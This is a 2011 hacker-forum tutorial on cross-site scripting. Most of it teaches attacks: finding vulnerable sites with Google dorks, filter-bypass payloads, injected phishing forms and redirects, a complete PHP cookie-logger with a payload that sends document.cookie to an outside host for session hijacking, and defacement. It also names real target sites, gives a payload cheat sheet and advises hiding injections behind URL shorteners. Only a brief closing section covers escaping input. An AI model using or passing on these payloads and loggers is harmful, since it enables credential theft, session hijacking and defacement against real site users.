Guide Book on Cross Site Scripting // Best Viewed in Notepad++ with wo

1. Guide Book on Cross Site Scripting
2.  
3. // Best Viewed in Notepad++ with word wrap enabled :)
4.  
5.  
6. A Tribute To My Mother Land
7.  
8. " INDIA "
9.  
10.  
11. **********************************************************
12. We should be thankful and remember the bravery of Maharaja
13. Prithvi Raj Chauhan, Maharana Pratap, Chandra Shekhar Azad,
14. Bhagat Singh, Rajguru, Sukhdev and all those who vanished
15. their lives for the sake of freedom and sanctity of the
16. land named Hindustan (collectively India, Pakistan &
17. Bangladesh).
18.  
19. We might remember the intrepid spirit who stood an army
20. named “Azad Hind Fauj” from prisoners of world war II far
21. from India and fought for our freedom, The Great Subhash
22. Chandra Bose. Remember His Words of inspiration
23.  
24. “Tum mujhe khoon do, main tumhe azaadi doonga”
25.  
26. We might get inspired by their great lifestyles and follow
27. their thoughts.
28. **********************************************************
29.  
30.  
31.  
32.  
33. Important!... Warning!!!
34. The author do not take responsibility, if anyone, tries
35. these hacks against any organization or whatever that makes
36. him to trespass the security measures and brings him under
37. the legal prosecution. These hacks are intended for the
38. improvement of security and for investigations by legal
39. security agencies. For educational institutions it is
40. hereby requested that they should prevent their students
41. from using the tools provided in this paper against the
42. corporate world. This paper is the proof-of-concept and
43. must be treated as it is.
44.  
45.  
46.  
47.  
48. <|-[___________________________________________________________________________]-|>
49. - -
50. - [ Cross Site scripting ] -
51. - By Ankit Anand [CrazyAnkit ] -
52. - -
53. <|-[___________________________________________________ ________________________]-|>
54.  
55.  
56. # Written On 26 March 2011
57. # Author : Ankit Anand
58. [ [email protected] , ankitthehacker.wordpress.com
59. # Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
60. # Greetz Fly Out to : RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0
61.  
62. // Reference : Exploit-db , Aoh [Orkut] , Google ;)
63.  
64. --==+================================================================================+==--
65. --==+ Dedicated To My Loving parents +==--
66. --==+================================================================================+==--
67.  
68. =====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
69. Feel Free To Share This White paper , knowledge is for sharing , But Respect Author's Hardwork . Give Proper Credits !
70.  
71. =====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
72.  
73. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
74. |--( I ]> Introduction
75. 0x01: Introduction
76. 0x02: Finding The xss Vulnerable Websites
77. 0x03: Executing Xss Commands
78. 0x04: Bypass techniques
79. 0x05: Damages By Xss
80. \_ 1.) Inject a Phishing script
81. \_ 2.) Iframe Phishing
82. \_ 3.) Redirict Phishing
83. \_ 4.) Cookie stealing
84. \_ 5.) Defacing
85. \_ Xss Cheat Sheet
86. 0x06 : Fixing Xss Holes
87. 0x07: [The End]
88. |_| Conclusions
89.  
90.  
91. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
92.  
93.  
94. ---------------------
95. 0x01: Introduction :
96. ---------------------
97.  
98. xss also termed as css , no its not Cascading Style Sheets . xss is an abbreviation for cross site scripting . From The title itself its clear xss is related to scripts to be precise its javascripts . xss is a very common attackt found in web applications . 'XSS' allows the attacker to INSERT malicous code . The attacker can inject his malicious script into a website, and the browser just run's the code or script. XSS flaws comes up every time a website doesn't filter the attackers input.
99.  
100. There are many types of XSS attacks, I will mention 3 of the most used.
101.  
102. The First Attack i wana talk about is 'URL XSS' this means that the XSS wont stay on the page
103. it will only get executed if you have the malicous code in the URL and submit the url
104. we will talk more on how to use this in our advantage.
105.  
106. The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
107. vulnerable, for example say we found a site with a search engine, Now in the search box you enter
108. 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker'
109. ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
110. way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
111. Also wont stay on the server, this is for your eyes only.
112.  
113. The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
114. now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
115. inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
116. Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
117. HTML downloads to your pc and then your 'Browser' parses/interprets the code, (thats why its source is viewable)
118. With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
119. for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page !!!
120.  
121.  
122.  
123. ------------------------------------------
124. x02: Finding The xss Vulnerable Websites :
125. ------------------------------------------
126. This Wont be a tedious task if you have a good eye !
127. It is not really a big issue UNLESS it was permanent! Most Of the websites you come up with are vulnerable , the thing you need to have is just good knowledge about how to bypass the filteration . well , there are many techniques like
128. magic_quotes_gpc=ON bypass
129. HEX encoding
130. Obfuscation
131. Trying around
132. i will discuess them later !!
133.  
134. To Kick off start finding xss vulnerables you can check blogs,forums,comment boxes , shout boxes and anykinda input boxes !! . Dont Worry google will help us finding the websites . Using goole dork inurl:"search.php?q=" , we can get a list of common websites you can now try them !!
135. -------------------------------
136. 0x03 : Executing Xss Commands
137. ------------------------------
138.  
139. Injecting Xss script is a easy task as said above just you have to look for an input box !!
140.  
141. Let's say this is how a simple, unsecured search function looks like:
142.  
143. a vulnerable code would be:
144.  
145.  
146. <*?php
147.  
148. $message = $_POST['message'];
149.  
150. if (isset($_POST['message']))
151. {
152.  
153. echo "Thank you, your message has been posted!";
154.  
155. echo "
156. ";
157.  
158. echo $message;
159. }
160.  
161. echo "
162. <*form method='post' name='message_box'>
163. <*input type='text' name='message'>
164. <*input type='submit' name='submit'>
165. <*/form>";
166.  
167. ?>
168.  
169.  
170.  
171. ok, so now a malicious user could do the following:
172.  
173. submit the following text to test for vulnerability :
174.  
175.  
176. <*script>alert("xss")<*/script>
177.  
178.  
179.  
180. or
181.  
182.  
183. <*h1>Nice Website!<*/h1>
184.  
185.  
186.  
187. IF the HTML gets parsed "and it will in this code" , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..
188.  
189. some methods of bypassing some filters, for example, if the form only submits links, lets take this one as an example:
190.  
191.  
192.  
193.  
194. <*?php
195.  
196. $message = $_POST['message'];
197.  
198. if (isset($_POST['message']))
199. {
200.  
201. echo "Thank you, your link has been added!";
202.  
203. echo "<*br />";
204.  
205. echo "<*a href='$message'>Link<*/a>";;
206. }
207.  
208. echo "
209. <*form method='post' name='message_box'>
210. <*input type='text' name='message'>
211. <*input type='submit' name='submit'>
212. <*/form>";
213.  
214. ?>
215.  
216. now that should not parse anything, but simply wrap it in a link right?
217.  
218. well, i don't think so, you can simply bypass it using:
219.  
220.  
221.  
222. '> <*script>alert("owned")<*/script>
223.  
224.  
225.  
226. why does that bypass it?!
227.  
228. here is what happens, the
229.  
230.  
231. '>
232.  
233. will stop the a tag, and then you can open anything else...
234.  
235. here is the result:
236.  
237.  
238. <*a href=''> <*script>alert("owned")<*/script>'>Link<*/a>
239.  
240.  
241.  
242. as you can see, the a tag got closed, which allowed me to open another tag, which is a script here. and it works :)
243.  
244.  
245. ---------------------------------------------
246. 0x04 : Bypass techniques
247. ---------------------------------------------
248.  
249. As Said in section 0x02 , Here i am going to discuss about bypass techniques :)
250.  
251.  
252. There are a lot of ways to bypass XSS filters on websites, I'll number some:
253.  
254. \_ 1.) magic_quotes_gpc=ON bypass
255. \_ 2.) HEX encoding
256. \_ 3.) Obfuscation
257. \_ 4.) Trying around
258.  
259. 1.) magic_quotes_gpc=ON is a php setting (php.ini).
260. It causes that every ' (single-quote), " (double quote) and \ (backslash)
261. are escaped with a backslash automatically. It's also a well known method
262. to avoid XSS flaws, although it's exploitable.
263.  
264. How to bypass it when it's ON? - use the javascript function called
265. String.fromCharCode(), just convert your text in decimal characters
266. (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.
267.  
268. Using "ankit" (without quote sign) will look like this:
269.  
270. String.fromCharCode(97, 110, 107, 105,116)
271.  
272. now insert this in your alert script:
273.  
274. www.site.ru/google.php?search=<script>alert(String.fromCharCode(97, 110, 107, 105,116));</script>
275.  
276. 2.) HEX encoding is a useful bypass method, too. Using this step will encode
277. your script, so you can't see clearly on the first look what the code will cause.
278. This is how
279.  
280. <script>alert(/turtles/);</script>
281.  
282. looks like encrypted in HEX:
283.  
284. www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
285.  
286. 3.) Obfuscation - sometimes website administrator simply put words like
287. "script","alert()","''" on the "badwords list", that means, when you
288. search for "script" on the website, it just shows you an error, like
289. "you are not allowed to search for this word" or something.
290. but this is a weak protection, you can bypass it using obfuscation.
291. your javascript code like:
292. <sCrIpT>alert('turtles');</ScRiPt>
293.  
294. There are like unlimited possibilities, but that leads us to the
295. next chapter...
296.  
297. 4.) Trying around: sometimes you just got to try around, because every website
298. is secured/unsecured in a different, unique way. Some doesn't even use
299. cookies for example. Alway's keep a look at the website's source code!
300. Sometimes you need to adjust your XSS script, like:
301.  
302. "><script>alert(/ankit/);</script>
303.  
304. This you need sometimes if you injected your code into a searchbox e.g. and
305. interrupt a html tag, so you first need to close him, then start a new
306. tag (<script>...).
307.  
308. Anyway, there are lot's of different methods how to bypass XSS filtration,
309. try around !
310.  
311. --------------------
312. 0x05: Damages By Xss
313. --------------------
314.  
315.  
316. Till Yet I have elaborated on xss and its basics . i showed you to how to spawn a javascript alert message on a website. Now lets concentrate on what havoc can xss bring if the site is vulnerable To Xss. If You are still thinking xss is useless and just to show off think agian .:) .. Let me remeber you Twitter , Facebook , orut , NDTV , BSNL Are heavily Affected by the xss And its sub methods . Here are some attack techniques you can do with a XSS flaw:
317.  
318. 1.) Inject a Phishing script
319. 2.) Iframe Phishing
320. 3.) Redirict Phishing
321. 4.) Cookie stealing
322. 5.) Defacing
323.  
324.  
325.  
326. ---------------------------
327. \_ 1.) Injecting A phishing page :
328. ---------------------------
329.  
330. Assuming you are aware of what the heck is Phishing [ no , its not fishing :P , but kinda related to it ]
331. Phishing script inject: Just inject a 'user' and 'password' field in html
332. (With the <html> and <body> tags), that the victim may think he need's to login to the target site.
333.  
334. Here an example:
335.  
336. www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
337. <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
338. Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
339. <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
340. <br /></form></div></body></html>
341.  
342. You Can Carry Your Operation On this
343.  
344.  
345. |======================|
346. | http://www.gamez.pk/ |
347. |======================|
348.  
349.  
350. content of phishingscript.php
351.  
352. <?php
353. $login = $_POST['user'];
354. $password = $_POST['Password'];
355. $open = fopen('log.txt', 'a+');
356. fputs($open, 'Username : ' . $login . '<br >' . '
357. Password : ' . $password . '<br >' . '<br >');
358. ?>
359.  
360.  
361.  
362. ---------------
363. \_ 2.) Iframe Phishing
364. ---------------
365. Iframe Phishing: Simple thing, just inject a javascript code containing an iframe where your phishing site is embeeded. Obviously it needs to look just like the target site.
366.  
367. Here an example:
368.  
369. www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>
370.  
371. (Note: height="100%" width="100%" means that the whole window is filled with
372. that iframe.)
373. The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
374. difference and log in (If they're are foolish enough).
375.  
376.  
377.  
378. --------------------
379. \_ 3.) Rediriction Phishing:
380. --------------------
381. Also simple, just inject a javascript rediriction script that leads to your phishingsite, of course it needs to look just like the target site.
382.  
383. Here an example:
384.  
385. www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
386.  
387. or
388.  
389. www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
390.  
391.  
392.  
393. \_ 4.) ----------------
394. Cookie Stealing
395. ----------------
396.  
397. I decided To add this part , as i have seen lot of papers , ebboks ,artciles not covering this part and if hey do add , its not clear to the readers so its here :)
398.  
399. Its the most usefull and vital part in xss . You Just have to Put your cookie logger script on your webspace and insert javascript into xss vulnerable with the cookielogger script address :) Rest The Script Will Do , You Will Get the cookies to eat with tea/coffee :P ..
400.  
401.  
402.  
403. <*?php
404.  
405. function GetIP()
406. {
407. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
408. $ip = getenv("HTTP_CLIENT_IP");
409. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
410. $ip = getenv("HTTP_X_FORWARDED_FOR");
411. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
412. $ip = getenv("REMOTE_ADDR");
413. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
414. $ip = $_SERVER['REMOTE_ADDR'];
415. else
416. $ip = "unknown";
417. return($ip);
418. }
419.  
420. function logData()
421. {
422. $ipLog="log.txt";
423. $cookie = $_SERVER['QUERY_STRING'];
424. $register_globals = (bool) ini_get('register_gobals');
425. if ($register_globals) $ip = getenv('REMOTE_ADDR');
426. else $ip = GetIP();
427.  
428. $rem_port = $_SERVER['REMOTE_PORT'];
429. $user_agent = $_SERVER['HTTP_USER_AGENT'];
430. $rqst_method = $_SERVER['METHOD'];
431. $rem_host = $_SERVER['REMOTE_HOST'];
432. $referer = $_SERVER['HTTP_REFERER'];
433. $date=date ("l dS of F Y h:i:s A");
434. $log=fopen("$ipLog", "a+");
435.  
436. if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
437. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
438. ");
439. else
440. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
441. fclose($log);
442. }
443.  
444. logData();
445.  
446. ?>
447.  
448.  
449. Above is the cookie logger script . Make a tlog.txt and put both of them on your webspace and set "chmod 777".
450. Inject the following code in your target website:
451.  
452. http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
453.  
454. // obviously you have to rename the name of script :) .. use a name that seems less suspecious :O
455.  
456. Now As soon as the user visits the page victim's cookie will be trapped in your log file . Once You Got the cookies you can hijack there session :)
457.  
458. // You Can use Firefox Addons , Maybe Available for chrome too :)
459.  
460.  
461.  
462. --------
463. \_ 5.) Defacing
464. --------
465.  
466. Well now you understand how XSS works, we can explain some simple XSS deface methods, there
467. are many ways for defacing i will mention some of the best and most used,
468.  
469. the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
470. displays the IMAGE linked to it on the webpage.
471.  
472. <b>xSsed by Ankit</b><head><body><IMG SRC="site.com/jpg" width= 700 height= 700></body></head>
473.  
474. Example ::
475.  
476. http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cb%3ExSsed%20by%20CrazyAnkit%3C/b%3E%3Chead%3E%3Cbody%3E%3CIMG%20SRC=%22http://ploader.net/files/87be7175082785f6e890497951c61ebc.jpg%22%20width=%20700%20height=%20700%3E%3C/body%3E%3C/head%3E
477.  
478.  
479.  
480.  
481.  
482. the other tags are not needed has the page will already have them. (rare cases they will not)
483.  
484. Ok it helps to make your picture big so it stands out and its clear the site got hacked.
485.  
486. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
487.  
488. <EMBED SRC="http://site.com/xss.swf"
489.  
490. that will execute the flash video linked to it.
491.  
492. Or maybe using a pop or redirection?
493.  
494. <SCRIPT>alert("Ankit Z here")</SCRIPT> // pop up
495.  
496. <script>window.open( "http://www.google.com/" )</script> // redirecion
497.  
498. There Are Tons of others too I Will Add Them in Next Section "" Xss : Cheat sheet "" . The Deapth is too much that i would have to write an another paper for cheat sheet
499.  
500. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
501. Cheat Sheets
502. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
503.  
504. Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
505. Enjoy. !!
506.  
507. '';!--"<XSS>=&{()}
508.  
509. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
510.  
511. <IMG SRC="javascript:alert('XSS');">
512.  
513. <IMG SRC=javascript:alert('XSS')>
514.  
515. <IMG SRC=javascript:alert("XSS")>
516.  
517. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
518.  
519. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
520.  
521. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
522.  
523. <IMG SRC=javascript:alert('XSS')>
524.  
525. <IMG SRC=javascript:alert('XSS')>
526.  
527. <IMG SRC=javascript:alert('XSS')>
528.  
529. <IMG SRC="jav ascript:alert('XSS');">
530.  
531. <IMG SRC="jav ascript:alert('XSS');">
532.  
533. <IMG SRC="jav
534. ascript:alert('XSS');">
535.  
536. #############################################################
537. # #
538. # PROTIP FOR EVERY XSS INJECTION: #
539. # use url shortener services such as tinyurl.com or bit.ly #
540. # to 'hide' your injection, so the victim won't know what's #
541. # behind that url. #
542. # #
543. #############################################################
544.  
545.  
546.  
547. ==xx==xx==xx==xx==xx==
548.  
549.  
550.  
551.  
552. ----------------
553. 0x06 : Fixing Xss Holes
554. ----------------
555.  
556.  
557. This Section is written for developers ,i mean web developers ;) . i will introduce with facts how can you secure your code
558. well , i found this section to be most mind bending still i have written the best i can .. [i am not good in explain things !!]
559.  
560. please go to this URL for more info about this
561.  
562. ####################################################################################
563. http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
564. ####################################################################################
565.  
566.  
567. well, leaving useless talks lets talk about xss prevention :)
568.  
569. If you found XSS bugs in your scripts, its easy to secure, take a look at the below code
570.  
571. if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}
572.  
573. Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.
574. the following is a very easy way to secure that.
575.  
576. $charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
577. if(isset($data)){echo "<html><body>" .$data. "</body></html>";}
578.  
579. now that will take all possible code and make it not executable. by turning it into stuff like
580. < ect...
581.  
582. You will not notice a diffrence when using htmlentries();
583.  
584. there are also another common function, striptags(), find more info at php.net/striptags
585.  
586. ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)
587.  
588. $this = $_GET['id'];
589. echo "you are viewing " . $this . "blog";
590.  
591. now if we include ?id=<script>alert("XSS")</script>
592. into the url its gona execute our code, a very easy way to secure this is using (int) check the following code
593.  
594. $this = (int)$_GET['id'];
595. echo "you are viewing " . $this . "blog";
596.  
597. now if at anytime the varible contains anything but a Integer, it will return 0.
598.  
599. Thats enough said. huh !!
600.  
601. --------------------------------------
602. 0x07: XSS The Complete Walkthrough [The End]
603. --------------------------------------
604. |_| Conclusions
605.  
606. Well i have talked about xss !!i hope you have enjoyed my paper a lot while reading like i enjoyed [ believe me i am lying lol !! :D]
607.  
608. If you got any questions mail me @ [email protected]
609.  
610. I still have not included many topics in my paper like clicjacking with xss and vbSEO – From XSS to Reverse PHP Shell :P and few more :)
611. i will write a seprate paper on xss prevention later on :)
612.  
613. This is a very cute attack , enjoy it at its best !!
614.  
615.  
616.  
617.  
618.  
619. *************